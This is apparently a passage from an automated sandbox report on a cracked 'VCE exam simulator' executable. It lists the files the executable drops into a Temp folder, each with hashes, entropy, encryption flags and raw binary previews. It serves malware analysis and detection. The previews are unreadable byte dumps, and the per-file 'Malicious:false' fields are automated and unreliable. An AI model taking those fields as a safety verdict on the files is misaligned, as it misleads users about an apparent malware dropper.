                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):122880
                                                                                                            Entropy (8bit):6.683250049386535
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3072:yaW2UDQWf05mjccBiqXvpgF4qv+32eOyKODOSpQSg:yoUDtf0accB3gBmmLsiS+Sg
                                                                                                            MD5:A675A742AEB8349C8802723B1B053D6B
                                                                                                            SHA1:AD4AB8D9C4DA6DB64DC0B64A565715FF14BC8AAC
                                                                                                            SHA-256:B9DF637F8D5C0575690FF93F0C7F886DD75A2C70F841D89201F3401D33B859BF
                                                                                                            SHA-512:63B98BEA6D6C7CB8237EFBE9D2DE64BDEF4DCDE7B772195C2CCD8AF992790B2DBA3D4A3284E92D22F3F276B0E2A8C5BFC2615FEF95324498AE783C544BEED9D4
                                                                                                            Malicious:false
                                                                                                            Preview:...f....M.......M.|.I.....M..-I.....M.........M.........M.........M.....f....M..... .M.d.I...,.M..-I...0.M.......4.M.......8.M.......<.M.....f..@.M.....D.M...J...P.M.&.I...T.M.......X.M.......\.M.......`.M.....f..d.M.....h.M...I...t.M.40I...x.M.......|.M.........M.........M.....f....M.......M...I.....M..0I.....M.........M.........M.........M.....f....M.......M...I.....M..1I.....M.........M.........M.........M.....f....M.......M...I.....M..2I.....M.........M.........M.........M.....f....M.......M.l.J.....M..2I.....M.........M.........M.........M.....f....M.......M.\.I...(.M.G3I...,.M.......0.M.......4.M.......8.M.....f..<.M.....@.M...I...L.M..3I...P.M.......T.M.......X.M.......\.M.....f..`.M.....d.M...I.hH5M...p.M..3I...t.M.......x.M.......|.M.........M.....f....M....?f......D5M.;.......Q...hD5M..kf......=D5M....7...hD5M.........f..........U..QQ.E..@....A....tB...t9...........VQQ..$..^...u.......]...F...E.3....F.....^.....)......U..QQ.E..@....A....tB...t9...........VQQ..$.6]...u.......]

                                                                                                            C:\Users\user\AppData\Local\Temp\Giant

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):55296
                                                                                                            Entropy (8bit):7.9961795281878105
                                                                                                            Encrypted:true
                                                                                                            SSDEEP:768:WzsX4vlC0gWkIbvPV7MWQtwaHnqZTrhs9ZaLaPF1YhtPLi0/ecxiL3:kjNMOz971QuaHufhs+L2FshzgL3
                                                                                                            MD5:61986B5B8C0EE798BCBE01CF003EC160
                                                                                                            SHA1:742587ED68B54183D9D860A2309FE631F968B32D
                                                                                                            SHA-256:7884B57063A2D3F4BBD7F0E257AA5D46620F6A0CBF19CCC55191CB59F50D4452
                                                                                                            SHA-512:894C4BE71D1BDADAC2B49ABA448B176DDA593E6E827017A9BF786385D27B19848DE235F499D143873ED6D91938F602D3C42BD8657B6F423608D3ED60820A27BE
                                                                                                            Malicious:false
                                                                                                            Preview:.zTw.Z.....!..s.2...Y.h........... ..@.."...l.....p..0...0.......@/....&.^...c..a.....@O.0.."!....l...5..}..R......m..#.t._s.;..IfQ..|...gm..8U.O.~s..v..$"...BK...l9....:...+6c"...i......A..i_Z0.{.k............Dp..V)..>5.. C.l......!.22Qd.w.-%.......Y.K.Mn.....X..:..Kp...F.{....r..s...;.%......p.$=E..W...............Q^pn.....rC..4@.Op,.b....Es.N...G{.....%5.Y..)..}.S..W..M.........p.R..P...jU;m.T.....l.....V%n.Xi.`.(.F..o...(..i...(.:....{....~.i.Tu.$.2.}....A..x...C.(........IZ<.%..T5..C"..i._./.....?.wGc.;.u..tb..jb...%}..j[m...(!...8..eN.{....|..q.H..v..."...J..)0..eq.b...`.m.i..y5.g.-qY..s.h...=.3.......k.9...h..c......d..E..*...#ph.9..C$Nux..}u....7aD|g+..(.o$[ ._...Y..s.F..A3.....Z)u=..1...j..........C.t.T=..&w..8f.....j...Tf.d.c....B!.(...H.........g...G.9....^..G.Y.=.I...k...O..f....X(..w....$..T.....T7..(.....|.`..YK8..(..(5.J}..9)h...o5Z).).......,(.....p}.WC...c...<.....p........!C......F.?....?..(...dIss...T.....H.

                                                                                                            C:\Users\user\AppData\Local\Temp\Hawk

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):17002
                                                                                                            Entropy (8bit):7.988748852305347
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:384:DnuQr5fnNU4wtWereie6CXO9CfcePet5uoWIFPa69tg7:pFW4wtWereDBO9CEePet5jrN3g7
                                                                                                            MD5:9CC49434D069DE29052C64C005F2E7AF
                                                                                                            SHA1:EDD2FBFF8866B95D0805ADA7FBD867EE6988EEF0
                                                                                                            SHA-256:221E2A059A55EAC9CE9F95FE4A9A59B905666A296AD11CA8AB744CE010A3FC09
                                                                                                            SHA-512:69B445AB8A28F20BB93D680A448E4E22F4E08E1771518D1DB40310BA82E48E196F46809E68EFEBD5B86EFDBD6DA45A03958C660F7DA927D632C426D7DF24C520
                                                                                                            Malicious:false
                                                                                                            Preview:7{d. .a...dj-\...0.VLRP .1.H....jFFC.>R.....X<.D.n.*F.8='+.?...ftp_.7.d.wiR.....g)....B: .|>.Cd.K.-.\p.....&.X...B.rnW3.@;U.E............J...7..n..M...k.K5J...{S."..u.4skL../f`...Vf/o.k..l..1'6.E5f.9.\...-.l.7".b..V\.F..als....3...5q.h......{..........F..6s....2...s..f......4.yy..=.M..@...;6./....d%...e.....ed..,...[....@._{Nx.8.. @|......u........W....3..(...|X.qiq:....i.....2.0T.^z...>...$..aO......T4_..q..p.q.....X 4..oK..o..+.^..ez...T.Z....(..@....2b..5..)c.......X...nI.Vz..c+f..|...9.'=..O.......wa.YIN8..C...8'.._.....=1..+>..O...@..[.W7O.....MD7B.$..M./w.......J.?}..Rf.h.I..y)q..$.y..f.=...$.N.....mc~ k........8Y:........o..7.........p.C....:.a.Y..4..\....<.#.p........>.....Y.T.....~.?...\.iM...! ..f....\........J.OK_x$H..r.d..Zf.Pb..Gu..cGB....;."BE...R..PFaz...g...4...8.U..zH..3C{....b.j^H5.6.0Ozl.^...K..'.-..$.......c...R...A+...V..\/IR.....{..G...|.#7.z....=kq._6...6...B.\.<Lg.......|[..........#e.Y..&m.I.Q...W..u`'.#SA.`..

                                                                                                            C:\Users\user\AppData\Local\Temp\Instance

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):88064
                                                                                                            Entropy (8bit):7.998313205555342
                                                                                                            Encrypted:true
                                                                                                            SSDEEP:1536:7rSdcc7VFGNMSO5EuQVF/TryI2HfJTi6DYhy4VEKqjlSUZwFEQi0ATAi:7rSdcoFeMShf/TryI2xTPcySWjlb07/i
                                                                                                            MD5:565FAE236498799A46E480A5DE3F6711
                                                                                                            SHA1:54F357B3A867B290FA78A9C54E9D3F288E75ED17
                                                                                                            SHA-256:EAD2243CD55D834A6994B4F97CD7A53D0E9DE710A46381473ECECCBBDA73F49C
                                                                                                            SHA-512:2AF36E51010DEB5F9BCCBB08D2E79878409DC546B5A1AA3E795682DF7CE8A0BB00B891D12AE0B595FE0C3917E57C921E6DADA1C37221DE737DAE33B709D3E894
                                                                                                            Malicious:false
                                                                                                            Preview:S52G..x...@..~. .....bO..`.....u..4p...-d+.@....\.*..:.m92D.NX.~...s.}Ws..8..).....A..h...".;..Cm....XRt@.E.b..... T.v.k>>vm....=.=..Q.9.....o.0/..Vo.G...o.. |.r.K.0...>..U...';e.0...K.u.......}.r.u.hF......$.....C.2.t.....}D.|:.G....'.....W...LO....iS.^.,;X.z}.Mo.....U..6....C.nG..........9.^>.R...u..%..[n:..0....0nOiP"..._D.....A...}0VdX}..i..t....V....K.<[.w.p..T..KF....EJ,.2T.W.G.}[.G..#.%....C.Gki..#.X....[N~..v..7....o..6.h.*.z.o:....y..s.b.X..f6....=..../.AZ.....i..V...IZ/>2P....F0T%F.....oM..TMRXz...g...I.....4.[.XIwI.guVs.$.`.\....~.1....(...2.O~..7SqE.:.?'.....dx.......T...H......5.l(...E..kN ..-..^?....Q..i|t....m.....;jN>...c.M,..$.7y.......0Q.T.@v.S.4..+...U..P|...c..ql.....2......*._.w|~cR"O......8....D...c....3...f..t.?_[.n....o...3......3.".n.f.....k..{*...S...#W..i....&A0..{\....C..c:...lfB....7..+.:Z4x>~g.).g.......L.Y..w..8.J......H.d,.>e.y...D.5....S.n0..G.A...YH.f..U8-K.,.1...?._.7....mg^........(.j.....m....Y)....k..=.

                                                                                                            C:\Users\user\AppData\Local\Temp\Leading

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):69632
                                                                                                            Entropy (8bit):6.050496962224685
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:4R8anHsWccd0vtmgMbFuz08QuklMBNIimuzaAwuI:s8QLeAg0Fuz08XvBNbjaAtI
                                                                                                            MD5:07BDD195A3DD4499ADBA76BD5099C1C4
                                                                                                            SHA1:77111E0E1E81D67E7090BC68E5E6D43546C996D3
                                                                                                            SHA-256:58A7DD80A6ED5760D5854FBF872ED849DC8038C6830A976724909B2308F1003C
                                                                                                            SHA-512:234C23EB1E0EC3BDD412101E48D08F77E6D290D7EB06B37A0E314202216D144A07EA2974ECF5908F9A430CF81D0F1C501046BEAB76F019526C4BE0806557944B
                                                                                                            Malicious:false
                                                                                                            Preview:ift_2...__ptr64.__restrict..__unaligned.restrict(... new.... delete.=...>>..<<..!...==..!=..[]..operator....->..*...++..--..-...+...&...->*./...%...<...<=..>...>=..,...()..~...^...|...&&..||..*=..+=..-=../=..%=..>>=.<<=.&=..|=..^=..`vftable'...`vbtable'...`vcall'.`typeof'....`local static guard'....`string'....`vbase destructor'..`vector deleting destructor'....`default constructor closure'...`scalar deleting destructor'....`vector constructor iterator'...`vector destructor iterator'....`vector vbase constructor iterator'.`virtual displacement map'..`eh vector constructor iterator'....`eh vector destructor iterator'.`eh vector vbase constructor iterator'..`copy constructor closure'..`udt returning'.`EH.`RTTI...`local vftable'.`local vftable constructor closure'. new[].. delete[]...`omni callsig'..`placement delete closure'..`placement delete[] closure'....`managed vector constructor iterator'...`managed vector destructor iterator'....`eh vector copy constructor iterator'...`eh vector v

                                                                                                            C:\Users\user\AppData\Local\Temp\Let

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):93184
                                                                                                            Entropy (8bit):7.998127710439941
                                                                                                            Encrypted:true
                                                                                                            SSDEEP:1536:tooQZnj8pmTyjO07NH4U475Pqy2/rBcS0uEI24FfPQD07UGYVPb5oQXCzL7:tooQ5jxTyjOipk5OzBsDsfPwP9Izf
                                                                                                            MD5:5BA231E8355CCF5A593247DDAE88C07F
                                                                                                            SHA1:7A3657E55C53FA64308D45E6FED56EC1FCB1AA98
                                                                                                            SHA-256:170F47E746020D726CCDB482C209FAF3F1F23B514A2009DB2785C47CCFCD724E
                                                                                                            SHA-512:F47C590250F3E0DC69CA36B3F258D7370EA804994606D7FD494D2B598F4B4B720FBF1C9E3CB9E4B5B7A151330A2AE198771C27379515B10FD197E33EECB0C646
                                                                                                            Malicious:false
                                                                                                            Preview:K..I....D.X...p....NL..8...X.X........NHt7R.v...>....2V_......".P.9..a.Y.Q...s..zV..F..R......E..o.\.&.C).A._...Av"...YA.snP..i.pT.........i^..zU-........A...t..6...0..J..WylFC.=v\....L0R.W.3.l..XH.c...:.5D.O.&....k.X7G....A..z...H...F:t.......e..a...:.H......F...>0LG......1.<..(......9.G......o(~1...$e..Z...\.jOCo.[..9e..g..........p\...eX.g6.8.\.[..O`o.&.zww..?S^y.....zY....k......Pzul'.V....~...0G..q..\.........@...$..q9Qn.Z...E>...I....c.6...w.2.}.@V...XL)A.o.KMy...D.RJ.V.EHK..6.n.Y`b...G...A...U.4.......j_....C..)..*...<.I.rG.4..be.Q..&.....7.f.D.s....Dl-.W...SM..A<...I}.[@..........{..}...,2Z(7..]..P..s..2~...x/.._c.....Q]....#*..:.\...H.."~....W#..^...Fa....J..4@"q...9........".....#-+u..<..X.C...P........K8oB..U..Q^..U_\Y.,.f.@...*....Vb..77)..[T.E:...j..y?.Q.`.G..y.cf.*{o..VJ...a.E..(R}q..!.I........w=..-.d$k.-...A2;...C...j.._)P..V..N.DM.EU...H.>M.;-..).It..m.....q...H....<.&J...>...2 .....[.zb.T...=..K...

                                                                                                            C:\Users\user\AppData\Local\Temp\Malawi

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):53248
                                                                                                            Entropy (8bit):6.048531724393988
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:2Sb1/Dde6YF640L6wy4Za9IN3YRYfv2j62SfuVGHj1vtK7h9:f/Dde6u640ewy4Za9coRC2jfT9
                                                                                                            MD5:91A53CE5FA451D059806AE3E539CF38A
                                                                                                            SHA1:2A65F27688AC74AAC2A7D0D96EAF32B08C6F3908
                                                                                                            SHA-256:962E2BC969CB5E5D1C6DEBE1DF1AA1B143A76235D66851EFF62FA60A2264EBE1
                                                                                                            SHA-512:1D57BBE6A651F9D67B6B087C1BC9F94A5CB6086029FD5848EFEF8699D6DBEA8662CC84213FFCDC037BE7891B2C01D688954439FA776CC3AB83C9FDAC0C98E8F5
                                                                                                            Malicious:false
                                                                                                            Preview:.j.Wj0V..H.I..........u6.}$.tI.......j.P.......P.......P.......P.3....I.........u.8M$t.j.j.hB...V..H.I.j.S.u..{D..O.._^[Y]. .U..T)M.S.].Wj.j......h.......0..H.I...u.9E..........|..T)M........t .......u.j..0..\.I......u.O...}.GV.s..).T)M........t#.......u.j..0..\.I......u.F;5d)M.~.N..;.. .T)M.j.j.h..........0..H.I.C;.~..}...T)M.^u..M.j.j.h..........0..H.I..)...j....0..\.I......P.T)M.j.......0..@.I._[]...U..E(...u.j.X...}.....M SV.....W...u...U$...u...}0.|h.}.3.f9.t^SQ.u.RQ.u..u.PSh..L.S.u..a>...u.....t8WS..H.I.hg...P...u-W....I...t".u0Phg....6...u..6..<.I.2._^[].,..=.(M..u......f..........U..Q.}..SVW.......u(......},F.U ....#u(G....#},...u...M$...u...].f.E.f.......M.f......f.E.f......f..............u-j..[.....L)M.Y..@)M.......1...Z....M.........SS.u... ...;.......t9.=.(M..u......f...........PV.5@.I.j..3.......Wj..3.....2._^[Y].(.U..E(@..S..#E(VW.....P..P......t.....M,...u......j.Q.u..}..u$.u .u..u.P.u.h,.L.QW.<...u.....u.2..-..t.j..u.h.....7..H.I..=.(M..u......f........_^[]

                                                                                                            C:\Users\user\AppData\Local\Temp\No

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):75776
                                                                                                            Entropy (8bit):7.997651425891038
                                                                                                            Encrypted:true
                                                                                                            SSDEEP:1536:/o97CU8z8R+TGQgg87AlcNQLvKAIJIDwAGCRvBEs9ZPfdJVg:4Cpz8R+T7QAlmQLvcSWcvKs9Dg
                                                                                                            MD5:903EB3D3E9AD1FC11728B5FB60B91B4D
                                                                                                            SHA1:F5127FC2CB2C5F4379C9A89F05924BC706E764B1
                                                                                                            SHA-256:CEA9531815CA1E3422C35341FDCD98FF9F2E5C0EF978CC4AA759C8AF801210DA
                                                                                                            SHA-512:DC924CF3EC5E400647608A5D48C79C66023910F920AAE865CBD9F70620C19883945BBCE6CE8C4F1B954F66218D6EEFED0AD7B9387AFB41A3B2147090643D6AA4
                                                                                                            Malicious:false
                                                                                                            Preview:...}sb6....\R..Ib.x./.`s:.LSk...].<.4..+h.%..C+.....s../.#.....n......X....4.......F!+aP.B..*x....2..'..k@y..;.h......N...l..E..T..1...M.......k.r.....3..........n.....KT6.8i[...i*Eo..>.<..._;....Y..9.`..=...|T.4C=.F.E.....Tq..y.~...P._.M..ZL.'.......%.}...s]f.>x.~.AN.J+c........x.n..In..a.c.....3..<U{n.O.W...y}.:...{.a..8.n..]j...T.........zQPU...G............Jw.fn.!2..XD.+..m3,.t.4X` x....tg..Y1..;."......fJ.....n......!...qv#.(...B|.@}..7.`..;.Q.V.....!j..0...W.-/:M.D....'.+...V.C.........8....-[u....%.(.)....#..]..b.6......!=.y.s!-i[......~...wp...Qx.UP...6.|...|..`j...t.t.<N"..z?...y.. ..b.j...OY.L...?+M0UH..@a.zX}-...`^./...rCoZ2h..!+.JOeF.@5F.N..<l.C....AhaXQ...s...w...-AeF..3...v....ki:W.x.dw..o..jKaDJC..l.'.....^<J1..$..k.A.R}...$.......oN(q?>..>....HJ%.4...r.d~.D2.YM..i.Y<...N...hF....J.z....<...f.N*J...tx.'r......A.sGG...l........;.B.]z..:..q..NT..O...RN...?..^....C..P..|u........t...4.K.W..'....ZB.%..?.0.m5..l.......:...X,.e.....9....H.Z

                                                                                                            C:\Users\user\AppData\Local\Temp\Paper

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):100352
                                                                                                            Entropy (8bit):6.249729677231303
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3072:Rg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3W:C5vPeDkjGgQaE/W
                                                                                                            MD5:334C2F5301DE9795425CDCDDE4EF5563
                                                                                                            SHA1:5BB06EDCF0628A1C25D07BB1BD329495F5FBC765
                                                                                                            SHA-256:2CAA21C1C3CBE5A53FB5C5DC166B6A51B3B86B97470CCB5BECABA30ABD11EAF1
                                                                                                            SHA-512:ABFD372739E5C11CD05DD5483B0E96FB4B9762844C477B696E25712052E6B82872E20594031C15ED15C5677FDC56DA0F0A0FC0EA05094E0EA5943E39267D5AD3
                                                                                                            Malicious:false
                                                                                                            Preview:.E ...u..~8...q....._^....3....FP..FT..U...u...(M..K...P.....j.j.j..u...x.I.]...U..Q.@)M.V.u.Wj.....8W.z...............d)M.j.Z.U.;........T)M.....0.........F.;G.u{............8......../.....................VW......~d...(....~h...0....~D...8....~P...@....>.t..6..<.I..&..u........d)M..U.B.U.;..._....u... .........$.........@)M........t.Q.=.....@)M..... ..5.)M..E.N.5.)M.;.L)M.u...L)M....D)M.........._..^u..5.)M.j.....I..%.)M....D)M...t..@)M..D...8.u..<)M...........U..E.VW.@......P......u..........>3._.F.....^]...U......`.D$.V.u.WP.D$.PV..............L$..@)M..T$..L$........T)M..L$.....8.|$..............'........P............H..............a...WQ.P....7..<.I..t$...D.........d.........h.........P........D$.;F.t.P.....3.@_^..]....L$..N...3...U..V.u.;5t)M.........T)M........t.Q......T)M..... ...`)M...T)M.;5d)M.u....|.....8.u.N...5d)M...X)M.^...v..D...8.t.]...I..X)M.j..4......T)M.YY..X)M..$....X)M....v..T)M...x)M....t)M...T...V..Np......NT....N$....N....h....V.C...YY..^...U.

                                                                                                            C:\Users\user\AppData\Local\Temp\Penalties

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60416
                                                                                                            Entropy (8bit):7.997077627397972
                                                                                                            Encrypted:true
                                                                                                            SSDEEP:1536:wMY4QHEDWRtrmP6VjKPsmNBIlrj530Trcr3fi0HBCFqKRKz:0HEDWR06cFBIlrj90Pc7K06Kz
                                                                                                            MD5:59C9A57677CF74BE4378F6A558D98BEB
                                                                                                            SHA1:41E643F1A7C3334F87C874CDD21F48BBE9199317
                                                                                                            SHA-256:5DA0F25F004FAB1E48C50967BF0F1547AFC7ED19F6EAE7B9F12C50523FB2D8AA
                                                                                                            SHA-512:635A8452CB09F4A68B13ED138621859BFEA1747990ADCD360BC7EBA9C6D696693F2EE8A6F61FCD0A2EC08013047E64CC3CF32EBEB130ACD7EA3F7ECF76FFB769
                                                                                                            Malicious:false
                                                                                                            Preview:\.RYZ"..*:b`...<9.s...l.l:./.0..G.l......^.<h..../...W][.B...u.. ...~..>...}/.t..j..{..i......~.....Y...Qr...yF*...n*sm.c0..f.e....G.|.3V5...r.;v{.H...s...w...a.g.....9.-.i...).H....@.z.p..d.N..)......<p.....N........=.<.}.......|....pFX.m....q...*.5W..../_.'.*....T.[.9.5.D..w!.[R...8(..O)b......f.b...M%!..]E.=....T..K...n.....fh..)G..n.#.p$...d....j.*v.t......%7....7.(.J...._..{Q.<.....vf.L...r....sB......+...w....c}...e.[-...sb..... D...E.e....y..$^^!&b....`.y...........m....ki..............%.Zj.2z..w.U......B..<]/...........E.2.G...m..7K......^........H.y...S.{.S<bP...*..Q..{.../..E...!..S.z.M)...H.W.-h..9../h28.~j=......<b...Wjp.S..2\...).\.Ba.Ku3.T......5......K.`.....Q.L*5.....B0.k.%.r.f.7..~....P..98...w.1T^......e{L4......2q...;....r....aD...b.....#.<M.DQ2.kx.......]Y..e....J...8Hz].$b....R.8v....J;on)ZjDt..N.q}....A.....Y.ivAI...4d..6....m9..k..D.j._..n...}4....eI..x|.U.."..SY.........L{..n.}..."......L...........

                                                                                                            C:\Users\user\AppData\Local\Temp\Performances

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):144384
                                                                                                            Entropy (8bit):6.714568439435998
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3072:EmRxlHS3NxrHSBRtNPnj0nEoXnmowS2u5hVOoQ7t8T6pUkBJRa:/HS3zcNPj0nEo3tb2j6AUkBC
                                                                                                            MD5:5FA4E2D2588B2ABE9FFC10E27EDD400F
                                                                                                            SHA1:3D69AF0AAE0E3211733D00A8229418FBC84D60EB
                                                                                                            SHA-256:3173C8678F4B6D46C9A0A7672643AE4C2F1CD200C6769E5959927E5048DBB4F1
                                                                                                            SHA-512:8032DF6913A6CDF003826907783B9C8AF569FC47AB3C3B214E963999544F64E76CF2C984E764F3112CE8701B0681EFC21C4BC09190A4E38A8216051B8ABA8825
                                                                                                            Malicious:false
                                                                                                            Preview:...~.........N.Q...2n...D$@............$$...h..K...$.....$.........$.........v..j...$......3M.P..$,...P.......$$.........D$@...a....j.j..@.@P....Q...a......"....$.............Q..."....)M..5.........0.......j...L.....l.I...$....=............$....P..L.......I...L.....`.I...$.....D$@..P..`.I..P........D$@....Q.D$DP...H....U.........y....D$...t...t....J.....t......."......"....D$@....@.Ph..........t$8..t7.F....F..8.u..6.......j..v..a......j.V.V.......D$8.....D$<......................$..CE..D$0.p..f......j..t$4......D$0........P..R..p.I.j....r..6......j..t$4......t$0....P........j.V.....L$0....5...Q......*....L$0..........j.........t$0............~..j.V.d....|$..t..R.R.D$...PV.F4......j..D$4..P.D$ PV.O........@...Pjr......t$8..t7.F....F..8.u..6.d......j..v.........j.V.........D$8.....D$<.....h...........\....$..CE..D$0.p.........j.......t$0....3....N...~..j.V.....6........j..v.........H............}...........J...}..j..N..........A...j..;.......Q...T................

                                                                                                            C:\Users\user\AppData\Local\Temp\Reed

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):99328
                                                                                                            Entropy (8bit):7.99826147734658
                                                                                                            Encrypted:true
                                                                                                            SSDEEP:3072:Yxr+IaRIYIs4Y3TP3oaXTXIuuBnTXPDNXtNVE1TK0fh:y+ImFIszz3oaDyBT/xX9ERvfh
                                                                                                            MD5:C2D828DB4A1BC6A933A5DD08E9BD9860
                                                                                                            SHA1:871B8B42B9B5587465952BDF9ADBF28DE78E944D
                                                                                                            SHA-256:C32BA28FB4D05B79A44C059B5DCE64B2C643C5413AC7B41B653B448C28701888
                                                                                                            SHA-512:746B0F7230C0B8E2C2EE84AD4BCABB77F00F94CC5E3BFB15EFD2AF535E930BDC2D7481A791934981FD7C5CA481E3EDCE61E51ACAFF90051A1E431555A39C5591
                                                                                                            Malicious:false
                                                                                                            Preview:.1P..9..Z1.:b..P|..0C..()0..W..{.Z.+i..)<xU.x..> .-M.).~.W.....%.'.../@.U..=..)+N..f...T@&.!,J."v.{..?BE.e...../....S......('(...\U..?Q.gc...%#.;Y.T.o.q..E.. ..l.].P.?,..... .~Z9.H.^|.....M....,...6.Jb_.w.m.L.{!..z.`...<^.l.VK.....!>.<.Q......h<..X...N+.8.D..P.o).1W'..........^.(...d..-.o....}.=}...;U.I!s..+.l...7:O...f)f...yA.I.....o..l....9...a...-...];...2'.E..$.=zY:t..%.YP.=LG.:.....i..b8..*.`....^,.p.....!.\..?XY....|...........3......<..).....M_..y.......z..../.t.K.....'<.U......B..1 ..K.1#..Q.]..-.PVTy.F....[.0.j.`..P.....a4?w.Z`Z..5..c...>:U4...R,.....]...\.....)Rq....V.....s.X^.I..O.{.J...#r......z...).'H[.3........]W>.b*M..%.a1..E_..6[.._.|A@.~.S\=.}:V.EK.j.y.....Q..2..8Hh.g.G._...........d.027..l.......c...H.x`.l.m.ee.......}r.8f..G..lZk.J..JJ..+.OR....K${.J...?J..........h.r.HO..l;~.)l_...<..$.4...#...x.(.S.....X.PR.~.@]k..+."..... ......]:..,..\.........X.m.}..54..(u...+-j..g.Z.In...RH..m....#...^.7...@az..G...a.PM]..D..z.I..

                                                                                                            C:\Users\user\AppData\Local\Temp\Toe

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):79872
                                                                                                            Entropy (8bit):5.007371863648618
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:384:yzc/mwftIQXoSpu88888888888888888888888888888zv888888NfU84444QnoY:yc/mex/SGKAGJ
                                                                                                            MD5:82A2F6E8738ED7E66D8B68165392E4F1
                                                                                                            SHA1:0758DB6891B30B371A0CE1995C3E2E231CF828CD
                                                                                                            SHA-256:5FEB2AB8AC53902F8A0C59BE6F2D4CC7E33D9658D5895A38F6DA20E6522D2D35
                                                                                                            SHA-512:FE73D0837F4D75C84EF1A2581E73005FC9567650C73BEE9883460C563D9AEC0381F0F66EF25D5C24ECB763F3F99ED1B57D0F53BE953DE00F0A0E59CE2AB64294
                                                                                                            Malicious:false
                                                                                                            Preview:.3L..3L. 3L.,3L.43L.<3L.T3L.`3L.l3L..3L...J..3L..3L..3L..3L..3L..3L..3L..4L..4L.$4L.44L.D4L.T4L.l4L..4L..4L..4L..4L..4L..4L..4L..4L..4L..5L...J..5L.45L.P5L.p5L..5L..5L..5L..5L..6L.$6L.<6L.P6L.h6L..6L..6L..6L..6L..6L..7L. 7L.07L.L7L.h7L..7L..7L..7L..7L..7L..7L..8L..8L.(8L.<8L.L8L.`8L...J.......I.p8L.x8L..8L..8L..8L..8L..8L..8L..8L..8L..8L..8L..8L..8L..9L..9L..9L. 9L.49L.P9L.`9L.l9L..9L..9L..9L..9L..9L..9L..9L..9L..9L..:L..:L.(:L.8:L.D:L.P:L.\:L.l:L.x:L..:L..:L..:L..:L.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\Vary

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):6.678774978697638
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:vFrbCyI7P4Cxi8q0vQEcmFdni8yDGVFE5gOHu1CwCMIBZwneAJu7QnswIPumV3Bu:vU4CE0Imbi80PtCZEMnVIPPBxT/sZyd6
                                                                                                            MD5:FF200F0461B616F93558C59743F3D834
                                                                                                            SHA1:EF2A2925FAB87A81A180E91D77958453A2587CE6
                                                                                                            SHA-256:3F25CD216D16FB86F20A99ACBF7B44EDEC9A26DCEC2F93AEFD8FA92C776A2C0E
                                                                                                            SHA-512:344AB24B6FC37F906DE62B1255D489917D9690BDB44E10D3EFE70F38E0F58D95C8668308ECC4CD3AECEDB25395E5D0F31D7BC6BF2F1FED1D8F9983CD9A5F5AE9
                                                                                                            Malicious:false
                                                                                                            Preview:-...f..D$..D$.....f..d$.f.............?..f....3.%.........-....K.....p......u;.......p....2......+.........a....t.......@u.....t........F.....t.2...t.............K........-`>J..p............`......a...Au.....p.......-j>J....uS...........u.....[..............u.....u...t.....p.....-`>J....u...t..................X...`......a....u....-`>J...t.....p..............-`>J..p.......u....-`>J.......-~>J....`......a...Au........`......a..........`.................u......>J..........t....................V..t..V.....$.....$..v..u.......f.....t^..t................z..u.f..\..........?..f.?.f..^....^.....>J...l.....`....p.......a...........$..................#.z..u.f..\..........?..f.?.f..^....^.....>J...l.....`....p.......a......`......a..........$...........$........................#...............................t............b....b.....i...@t..p......p.......>J.....b....b.....i...@t..p.......p........b....b.....i...@t ...b....b.....i...@t..p.

                                                                                                            C:\Users\user\AppData\Local\Temp\Walls

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exe
                                                                                                            File Type:ASCII text, with very long lines (873), with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20756
                                                                                                            Entropy (8bit):5.105149918773854
